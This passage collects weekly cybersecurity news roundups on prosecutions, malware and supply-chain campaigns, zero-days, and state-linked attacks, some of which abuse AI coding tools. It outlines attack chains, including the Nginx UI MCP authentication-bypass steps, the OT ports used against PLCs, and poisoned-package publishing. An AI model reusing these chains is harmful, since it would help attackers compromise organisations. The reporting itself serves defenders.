The Good | Courts Sentence Karakurt Ransomware Negotiator & Two DPRK IT Worker Scheme Facilitators

Federal authorities have successfully secured a nearly nine-year prison sentence for Deniss Zolotarjovs, a Latvian national extradited to the U.S. for his critical role in the Karakurt extortion syndicate.

Operating as a specialized “cold case” negotiator, Zolotarjovs (aka Sforza_cesarini) systematically targeted victims who had previously stopped communications with the extortion group to avoid paying the ransom. To coerce the ransom payments, he focused on analyzing stolen personal data and information about the target companies to exert intense psychological pressure on the victims. In some cases, Zolotarjovs resorted to leveraging sensitive health information, including children’s medical records, to force the victim to complete the ransom payment.

The broader Karakurt operation has extorted an estimated $56 million from dozens of compromised organizations. As the first Karakurt member to face federal prosecution, Zolotarjovs’s sentencing is a hard-won milestone in ongoing efforts to dismantle international cyber-extortion rings.

In a separate victory, U.S. prosecutors sentenced two American nationals to 18 months in prison each for operating extensive laptop farms that actively facilitated North Korean cyber infiltration.

Matthew Knoot and Erick Prince were prosecuted for helping DPRK-based IT workers secure remote employment at almost 70 U.S. companies by exploiting stolen identities. The pair received company-issued laptops and deployed unauthorized remote desktop software, allowing the North Korean workers to seamlessly masquerade as legitimate domestic employees.

The FBI continues to warn about the thousands of North Korean IT workers working to infiltrate U.S. firms to steal intellectual property, implant malware, and siphon funds to the heavily sanctioned regime.

The Bad | PCPJack Worm Evicts TeamPCP, Steals Cloud Credentials at Scale

SentinelLABS researchers this week exposed PCPJack, a sophisticated credential theft framework and cloud worm that targets public infrastructure to harvest sensitive data.

Unlike other known cloud hacktools, the toolset actively hunts, evicts, and systematically deletes artifacts associated with TeamPCP, a threat group responsible for multiple high-profile supply chain intrusions earlier this year.

The multi-stage infection chain begins with a shell script called bootstrap.sh, which establishes persistence and selectively downloads specialized Python modules from an attacker-controlled Amazon S3 bucket. The malware extracts a massive array of sensitive credentials, including cloud access keys, Kubernetes service account tokens, Docker secrets, enterprise productivity application tokens, and cryptocurrency wallets. Unlike typical cloud-focused threat campaigns, PCPJack does not deploy cryptomining payloads on victims.

To achieve lateral movement, the framework exploits a number of web vulnerabilities, including severe Next.js and WordPress flaws, while aggressively scanning for poorly secured Docker, Redis, RayML, and MongoDB instances. Stolen data is then encrypted before being exfiltrated via attacker-controlled Telegram channels.

Security teams are advised to strictly enforce multi-factor authentication on service accounts, restrict Kubernetes access scopes, use an enterprise-wide vault, and thoroughly secure all exposed cloud management interfaces.

The Ugly | Palo Alto Warns of Critical Flaw in PAN-OS Enabling Remote Code Execution

Palo Alto Networks customers were issued an urgent warning this week regarding a critical-level, unpatched zero-day vulnerability currently being exploited in the wild.

Tracked as CVE-2026-0300, the buffer overflow flaw directly impacts the PAN-OS User-ID Authentication Portal (aka the Captive Portal), enabling unauthenticated attackers to execute arbitrary code with root privileges using specially-crafted packets.

With a CVSS score of 9.3, the vulnerability presents an immediate risk to enterprise networks. Threat watchdog Shadowserver has currently identified over 5,000 vulnerable firewalls exposed online, primarily concentrated across Asia and North America.

This actively exploited vulnerability adds to the growing pattern of targeting edge infrastructure. PAN-OS has a well-documented history of severe zero-days, and with 90% of Fortune 10 companies and many major U.S. banks depending on it, the exposure is significant. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, setting mandatory remediation deadlines for federal civilian agencies.

With a patch not expected until mid-May, Palo Alto is urging administrators to secure affected environments immediately, starting by confirming exposure via the device’s Authentication Portal Settings. To successfully mitigate the threat of remote code execution, security teams can restrict all User-ID Authentication Portal access exclusively to trusted internal IP addresses. If strict network segmentation is impossible, organizations are being advised to disable the Captive Portal service until updates can be safely applied.

The Good | Authorities Dismantle State-Backed Espionage & Cybercrime Rings

This week, authorities successfully secured the extradition of Xu Zewei, an alleged Chinese Ministry of State Security (MSS) contract hacker, from Italy to the U.S. to face severe federal cyberespionage charges. Operating alongside the Silk Typhoon group, Xu systematically compromised internet-facing systems during a highly coordinated intelligence-gathering campaign between February 2020 and June 2021. The DoJ says that the attackers relentlessly targeted COVID-19 research organizations, stealing critical vaccine and treatment data by exploiting Microsoft Exchange Server zero day vulnerabilities and deploying malicious web shells for deep network access. Xu is set to appear in federal court where he faces multiple counts of computer intrusions and conspiracy.

European law enforcement agencies have dismantled a widespread cryptocurrency investment fraud network responsible for inflicting over €50 million in estimated global losses. Operating almost identically to a legitimate enterprise, the syndicate employed up to 450 individuals across several specialized call centers located in Albania. Threat actors worked by luring vulnerable victims through online advertisements, assigning “retention agents” who wore down the targets through intense pressure and remote access software to manipulate deposits. Illicit funds were then channeled into international money-laundering pipelines to evade authorities worldwide.

Evan Tangeman is receiving a nearly six year prison sentence for laundering $230 million in a cryptocurrency heist that took place between October 2023 and May 2025. Based on court documents, attackers initially breached a Washington D.C. victim by aggressively impersonating Gemini customer support, leveraging remote desktop software to steal thousands of Bitcoin after bypassing two-factor authentication protocols. Tangeman systematically obfuscated the stolen proceeds through a network of cryptocurrency mixers, exchanges, and virtual private networks. The ill-got funds financed the criminal organization’s lavish lifestyle until his eventual arrest by law enforcement officials.

The Bad | New Report Shows Scammers Stole $2.1 Billion from Social Media Users

A new warning has come from the U.S. Federal Trade Commission (FTC) regarding a pointed surge in social media fraud, with reported consumer losses exceeding $2.1 billion in 2025. Representing an eightfold increase since 2020, malicious actors actively leveraged platforms like Facebook, Instagram, and WhatsApp to exploit nearly 30% of all fraud victims last year. Remarkably, individuals reported losing significantly more money to Facebook-originated schemes than to traditional text and email campaigns combined, establishing the platform as the primary threat vector for almost every age demographic.

Who gets scammed more often, younger people or older adults? At the FTC we know scammers target everyone, and FTC Chairman @AFergusonFTC has a message that might surprise you: pic.twitter.com/8kveWbsM0e

— FTC (@FTC) April 27, 2026

Operating with a global reach and minimal overhead, threat actors systematically hijack legitimate user accounts, analyze personal posts to craft highly targeted social engineering lures, and actively purchase deceptive advertisements. These criminal syndicates utilize the exact same marketing tools legitimate businesses employ, filtering potential victims by age, precise interests, and specific shopping habits to maximize the returns.

In direct response to these findings, Meta has already removed more than 159 million scam advertisements and taken down nearly 11 million malicious accounts tied to criminal operations last year. Additionally, the tech giant has introduced advanced anti-scam protections across its product ecosystem, proactively flagging suspicious friend requests, implementing intelligent chat detection systems, and introducing critical screen sharing warnings on WhatsApp to disrupt fraudulent video calls.

To successfully navigate and mitigate social engineering tactics, federal authorities strongly urge users to strictly limit profile visibility, independently verify unfamiliar online vendors, and reject any unsolicited investment advice originating from unknown social media contacts.

The Ugly | Threat Actors Poison SAP-Related npm Packages in Supply Chain Attack

Cybersecurity researchers are tracking a highly sophisticated supply chain attack targeting SAP-related npm packages with credential-stealing malware. Dubbed “Mini Shai-Hulud”, the campaign recently compromised vital packages within SAP’s cloud application development ecosystem, including @cap-js/db-service@2.10.1, @cap-js/postgres@2.2.2, @cap-js/sqlite@2.2.2, and mbt@1.2.48. Threat actors executed the breach by exploiting an npm OIDC trusted publishing configuration gap, allowing them to exchange a token and publish poisoned package versions to the registry.

Once installed, the malicious releases deploy a preinstall script acting as a runtime bootstrapper to immediately download and execute a platform-specific Bun binary. The malware then harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, cloud secrets from major providers, and passwords across multiple web browsers. To establish persistence, the payload targets AI coding agent configurations by injecting malicious files into Claude Code and Visual Studio Code settings. This ensures automated execution whenever an infected repository is opened. To add to this, the malware deliberately terminates on Russian-locale systems, strongly linking the entire operation to previous TeamPCP threat actors.

The stolen data is securely encrypted using AES-256-GCM and exfiltrated to public GitHub repositories created on the victim’s own account. By leveraging GitHub as their primary command and control (C2) infrastructure, the attackers make tracing and blocking exfiltration exceptionally difficult for security and development teams.

Since the massive payload utilizes stolen tokens to aggressively self-propagate, injecting malicious workflows into newly discovered repositories further spreads the poisoned packages across environments. Package maintainers have rapidly released updated, safe versions of the affected software to immediately mitigate this expanding threat.

The Good | Two Cybercrime Leaders Face Justice for Fraud, Identity Theft & Extortion

Tyler Robert Buchanan, a 24-year-old British national believed to be a leader of the UNC3944 cybercrime group, has pleaded guilty in the U.S. to wire fraud and aggravated identity theft. Prosecutors say Buchanan and four accomplices stole at least $8 million in cryptocurrency by targeting employees at multiple organizations with SMS phishing attacks between 2021 and 2023. Victims were tricked into entering credentials on fake company login pages, allowing attackers to hijack email accounts, conduct SIM swaps, and drain cryptocurrency wallets.

Arrested in Spain in 2024 and extradited to the U.S. in last year, Buchanan now faces up to 22 years in prison at his sentencing this August. UNC3944 (aka 0ktapus, Scattered Spider) has historically been linked to major breaches at MGM Resorts International, Twilio, and Caesars Entertainment.

In a second guilty plea this week, Angelo Martino, a former ransomware negotiator at DigitalMint, has formally admitted to helping the BlackCat ransomware gang extort U.S. companies. Martino secretly shared clients’ confidential negotiation strategies and insurance policy limits with BlackCat operators, enabling them to demand larger ransoms. He also worked directly with other DigitalMint and Sygnia accomplices to launch ransomware attacks against multiple victims in 2023, targeting law firms, school districts, medical facilities, and financial firms. In one case, a victim paid over $25 million to settle the ransom.

Authorities have since seized $10 million in Martino’s assets, including cryptocurrency and luxury vehicles. He will also receive up to 20 years in prison when sentenced in July under the charge of conspiracy to and interference with interstate commerce by extortion as well as intentional damage to protected computers.

The Bad | Chinese-Linked Threat Actors Expand Botnets to Disguise Cyberattacks

The U.K.’s National Cyber Security Centre (NCSC-UK) and allied cyber agencies are warning that China-linked actors are increasingly relying on vast proxy networks of hijacked consumer devices to conceal cyberattacks and evade detection. A new joint statement details how the threat actors now route malicious traffic through compromised routers, cameras, recorders, and network-attached storage (NAS) devices instead of using rented infrastructure. This method means attacks are harder to trace since their geographic origins are masked.

Officials say most China-nexus groups are now leveraging constantly shifting covert proxy networks, sometimes shared across multiple threat actors. These networks are mostly made up of Small Office Home Office (SOHO) routers, smart devices, and Internet of Things (IoT) devices. One example is a massive botnet called Raptor Train, which infected more than 260,000 devices in 2024 and was linked by the FBI to the state-backed Flax Typhoon and Integrity Technology Group, sanctioned back in January 2025. Another network, KV Botnet, has been tied to the PRC-backed Volt Typhoon group and targets vulnerable routers that no longer receive security updates. Though KV Botnet was disrupted by authorities in January 2024, Volt Typhoon actors began reviving it as of November that same year.

Authorities warn these botnets undermine traditional IP-blocking defenses because their infrastructure constantly changes. To reduce exposure, organizations are being urged to strengthen edge security by enforcing multi-factor authentication, maintaining updated inventories of internet-facing devices, using dynamic threat intelligence feeds, and adopting zero-trust controls. The advisory outlines the growing concern that everyday internet-connected devices are being weaponized at scale to support stealthy cyber operations targeting governments, telecom providers, defense contractors, and critical infrastructure worldwide.

The Ugly | ShadowBrokers Leak Links to Pre-Stuxnet Sabotage Framework

SentinelLABS has identified a previously undocumented cyber sabotage framework, tracked as “fast16”, with core components dating back to 2005. The operation centers on a kernel driver, fast16.sys, designed to intercept executable files in memory and subtly alter high-precision calculations to corrupt scientific and engineering outputs at scale.

The framework predates Stuxnet by at least five years and even early Flame-era tooling, making it one of the earliest known examples of a modular, Lua-based malware architecture. It was discovered alongside a companion service binary, svcmgmt.exe, which embeds a Lua virtual machine, encrypted bytecode, and system-level modules for propagation, persistence, and coordination across infected systems.

Unlike typical worms of its era, fast16 was engineered for targeted sabotage rather than indiscriminate spread. It selectively identifies compiled executables, particularly those using Intel toolchains, and injects rule-based modifications into floating-point computation routines.

SentinelLABS believes this could have introduced systematic errors into domains such as physics simulations, cryptographic research, and structural engineering models, effectively undermining high-value scientific workloads without obvious system failure. The carrier component also functions as a self-propagating wormlet (wormable payloads) platform, capable of deploying across networks using native Windows2000/XP services and weak administrative credentials.

SentinelLABS linked fast16.sys to the infamous ShadowBrokers leak from 2017 via deconfliction signatures used within advanced state-level tooling ecosystems by the NSA. Although full target attribution remains incomplete, analysis of matching code patterns suggests potential alignment with high-precision simulation software used in engineering and defense research.

The fast16 framework offers a rare early glimpse into real-world operations where kernel-level tampering, modular scripting, and precision sabotage logic were already converging. Although fast16 itself was built to run on now-obsolete operating systems, SentinelLABS discovery pushes back the accepted timeline on modern tradecraft, showing how well-resourced actors had been building long-lived implants that prefigured today’s state-backed cyber programs years earlier than previously thought.

The Good | U.S. Authorities Seize W3LL Phishing Ring & Jail DPRK IT Worker Scheme Facilitators

The FBI has dismantled the “W3LL” phishing platform, seized its infrastructure, and arrested its alleged developer in its first joint crackdown on a phishing kit developer together with Indonesian authorities. Sold for $500 per kit, W3LL-enabled criminals to clone login portals, steal credentials, bypass MFA using adversary-in-the-middle techniques, and launch business email compromise attacks.

Through the W3LL Store marketplace, more than 25,000 compromised accounts were sold, fueling over $20 million in attempted fraud. Even after the storefront shut down in 2023, the operation continued through encrypted channels under new branding. It was then used against over 17,000 victims worldwide after W3LL gave cybercriminals an end-to-end phishing service. Investigators say the takedown disrupted a major criminal ecosystem that helped more than 500 threat actors steal access, hijack accounts, and commit financial fraud.

From the DoJ, two U.S. nationals have been sentenced for helping North Korean IT workers pose as American residents and secure remote jobs at more than 100 U.S. companies, including Fortune 500 firms. Court documents note that between 2021 and 2024, the scheme generated over $5 million for the DPRK and caused about $3 million in losses to victim companies. The defendants used stolen identities from over 80 U.S. citizens, created fake companies and financial accounts, and hosted company-issued laptops in U.S. homes so North Korean workers could secretly access corporate networks.

U.S. officials said the operation endangered national security by placing DPRK operatives inside American businesses. Kejia Wang will receive nine years in prison, while Zhenxing Wang is sentenced to over seven years. Authorities say the broader network remains active, with additional suspects still at large, as North Korea continues using fraudulent remote workers to fund government operations and evade sanctions.

The Bad | New “AgingFly” Malware Breaches Ukrainian Governments & Hospitals

Ukraine’s CERT-UA has uncovered a new malware campaign using a toolset called “AgingFly” to target local governments, hospitals, and possibly Ukrainian defense personnel.

The attack (UAC-0247) begins with phishing emails disguised as humanitarian aid offers that lure victims into downloading malicious shortcut files. These files trigger a chain of scripts and loaders that ultimately deploy AgingFly, a C# malware strain that gives attackers remote control of infected systems.

Once installed, AgingFly can execute commands, steal files, capture screenshots, log keystrokes, and deploy additional payloads. It also uses PowerShell scripts to update configurations and retrieve command and control (C2) server details through Telegram, helping the malware remain flexible and persistent.

One notable feature is that it downloads pre-built command handlers as source code from the server and compiles them directly on the infected machine, reducing its static footprint and helping it evade signature-based detection tools.

Investigators found that the attackers use open-source tools such as ChromElevator to steal saved passwords and cookies from Chromium-based browsers, and ZAPiDESK to decrypt WhatsApp data. Additional tools like RustScan, Ligolo-ng, and Chisel support reconnaissance, tunneling, and lateral movement across compromised networks. CERT-UA says the campaign has impacted at least a dozen organizations and may also have targeted members of Ukraine’s defense forces.

To reduce exposure, the agency recommends blocking the execution of LNK, HTA, and JavaScript files, along with restricting trusted Windows utilities such as PowerShell and mshta.exe that are abused in the attack chain.

The Ugly | Attackers Exploit Nginx Auth Bypass Vulnerability to Hijack Servers

A critical vulnerability in Nginx UI, tracked as CVE-2026-33032, is being actively exploited in the wild to achieve full server takeover without authentication.

The flaw stems from an exposed /mcp_message endpoint in systems using Model Context Protocol (MCP) support, which fails to enforce proper authentication controls. As a result, remote attackers can invoke privileged MCP functions, including modifying configuration files, restarting services, and forcing automatic reloads to effectively gain complete control over affected Nginx servers.

Security researchers have reported that exploitation requires only network access. Attackers initiate a session via Server-Sent Events, open an MCP connection, retrieve a session ID, and then use it to send unauthenticated requests to the vulnerable endpoint.

This grants access to all available MCP tools, executing destructive capabilities like injecting malicious server blocks, exfiltrating configuration data, and triggering service restarts.

The vulnerability was patched in version 2.3.4 shortly after the disclosure, but a more secure release, 2.3.6, is now recommended. Despite the fix, active exploitation in the wild has been confirmed with proof-of-concept code publicly available.

Nginx UI is widely used, with over 11,000 GitHub stars and hundreds of thousands of Docker pulls, and scans suggest roughly 2,600 exposed instances remain vulnerable globally. Attackers can establish MCP sessions, reuse session IDs, and chain requests to escalate privileges, enabling stealthy persistence, configuration tampering, and full administrative control over exposed systems.

Organizations are urged to update immediately, as attackers can fully compromise systems through a single unauthenticated request, bypassing traditional security controls and gaining persistent control over web infrastructure.

The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org

This week, authorities in the U.S. carried out Operation Masquerade, a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 (APT28). The network involved the compromise of thousands of TP-Link small home and small office routers, spread across more than 23 U.S. states.

Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers. The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest.

For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors.

Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits

www.lumen.com/blog-and-new…

[image or embed]

— Catalin Cimpanu (@campuscodi.risky.biz) 7 April 2026 at 17:10

Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access.

According to DOJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or web management interface.

The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant.

The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation

SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to unwittingly copy-paste commands to the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep Apple’s response.

SentinelOne researchers discovered a campaign in which threat actors used a lure to install the popular AI-Assistant Claude to deliver AMOS malware. The lure leverages the appplescript:// URL scheme to launch the Script Editor from the user’s browser, with the editor pre-populated with malicious commands. The delivery mechanism offers threat actors a smooth, Terminal-free, attack flow that simply asks the user to perform a few clicks, with no copy-paste involved.

Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer malware that reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets and passsword stores in a single run. SentinelOne customers are protected against AMOS and similar variants of infostealer.

Researchers at JAMF later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space. Taken together, these campaigns suggest that Script Editor–driven ClickFix flows are becoming a reusable pattern rather than a one-off trick.

In the recent macOS Tahoe 26.4 update, Apple added a new security feature to warn users when pasting commands into the Terminal under certain conditions. Threat actors had moved towards the Terminal copy-paste method in response to Apple blocking a previous widely-used method of bypassing Gatekeeper via a Control-click override. However, the new Script Editor-based delivery mechanism entirely sidesteps these efforts and continues the long-running cat-and-mouse game between the operating system vendor and malware authors.

The Ugly | Iranian Hackers Target U.S. PLCs in Critical Infrastructure

Iran-affiliated APT actors are actively exploiting internet-facing operational technology (OT) devices, including Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors.

According to a joint advisory from CISA and other agencies, this activity has led to PLC disruptions, manipulation of data on HMI/SCADA displays, and in some cases operational disruption and financial loss. The authoring agencies assess that these Iranian-affiliated actors are conducting the campaign to cause disruptive effects inside the United States and note an escalation in activity since at least March 2026.

The campaign focuses on CompactLogix and Micro850 PLCs deployed in government services and facilities, water and wastewater systems, as well as the energy sector. Using leased third-party infrastructure together with configuration tools such as Rockwell’s Studio 5000 Logix Designer, the actors establish apparently legitimate connections to exposed PLCs over common OT ports including 44818, 2222, 102, and 502.

Once connected, they deploy Dropbear SSH on victim endpoints to gain remote access over port 22, extract project files such as .ACD ladder logic and configuration, and alter the process data operators see on HMI and SCADA dashboards. The same port-targeting pattern suggests the actors are also probing protocols used by other vendors, including Siemens S7 PLCs.

Iran-affiliated cyber actors are targeting operational technology devices across US critical infrastructure, including programmable logic controllers (PLCs). These attacks have led to diminished PLC functionality, manipulation of display data and, in some cases, operational… pic.twitter.com/odBD3lBi0l

— FBI Cyber Division (@FBICyberDiv) April 7, 2026

The advisory places this activity in the context of earlier IRGC-linked operations against U.S. industrial control systems. In late 2023, IRGC-affiliated CyberAv3ngers targeted Unitronics PLCs used across multiple water and wastewater facilities, compromising at least 75 devices. The latest wave extends that playbook to a broader set of PLC vendors and sectors, reinforcing that internet-exposed controllers with weak or missing hardening remain a priority target for disruptive state-linked operations.

The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time

This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.

The attack itself followed a multi-stage, fast-moving, pattern that is designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPi credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.

Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.

Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.

This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.

The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Compromised npm

For JavaScript HTTP client Axios, a major supply chain attack compromised its systems after malicious versions of an npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to include a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.

The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.

The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.

Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.

Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.

The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution

Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.

While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively-exploited Chrome flaws addressed in 2026 so far, bringing the total to four for this year alone. Previous issues included vulnerabilities in Chrome’s CSS component, Skia graphics library, and V8 JavaScript engine.

The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.

To protect against the flaw, Users can update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flow to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026 to prevent their networks from attack. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has given Russian national, Aleksey Volkov, almost seven years in person and ordered him to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have doled out two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement have also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware as well as laundered the illicit proceeds. The operations enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Résumés

Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Once the attackers gain elevated privileges, the attack then disables security defenses, modifies system settings, and downloads additional payloads from legitimate platforms and infrastructure like Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, which is defined by blending malicious activity with trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and maximize system resource exploitation. After execution, most artifacts are removed to limit forensic visibility, leaving only persistent mining and backdoor components.

Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely-used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.

The Good | Operation Synergia III Disrupts Malicious Networks & the EU Sanctions State-Sponsored Attackers

Operation Synergia III, an Interpol-led crackdown spanning July 2025 to January 2026, has disrupted global cybercrime infrastructure across the globe. Authorities across 72 countries sinkholed 45,000 malicious IP addresses and seized 212 devices and servers, resulting in 94 arrests and 110 ongoing investigations.

The operation focused on taking down servers used in connection to extensive phishing, ransomware, malware, and fraud networks. Regional actions highlighted the breadth of the cyber activity: Bangladesh police arrested 40 suspects tied to scams and identity theft, while law enforcement in Togo dismantled a fraud ring engaged in social engineering, including romance scams and sextortion.

In Macau, investigators uncovered over 33,000 phishing sites impersonating casinos, banks, and government services all posed to steal financial data. Building on earlier phases of the operation and complementary operations like Red Card 2.0, Serengeti, and Africa Cyber Surge, these joint efforts point to the growing sophistication of cybercrime and the critical role that coordinated international actions plays in stemming its reach.

To further hinder threat actors, the Council of the European Union has sanctioned three companies and two individuals tied to major cyberattacks on critical infrastructure.

China-linked Integrity Technology Group supported operations that compromised over 65,000 devices across six EU countries, while Anxun Information Technology (aka i-SOON) provided hacker-for-hire services targeting governments. Two of its co-founders have also been sanctioned for their part in executing the cyberattacks.

Iran-based company Emennet Pasargad has also been sanctioned for multiple influence campaigns and breaches, including phishing and disinformation efforts.

The Bad | Researchers Uncover ‘DarkSword’ iOS Exploit Stealing Sensitive Personal Data

